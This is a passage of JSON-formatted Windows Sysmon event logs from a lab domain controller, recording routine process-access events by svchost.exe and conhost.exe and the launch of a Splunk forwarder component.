C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:42.053\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2166-5F25-0000-001061830900}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:42.053","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2166-5F25-0000-001061830900}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6205,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:43.382\r\nProcessGuid: {41C8662E-2167-5F25-0000-001053850900}\r\nProcessId: 1476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:01:43.382","ProcessGuid":"{41C8662E-2167-5F25-0000-001053850900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 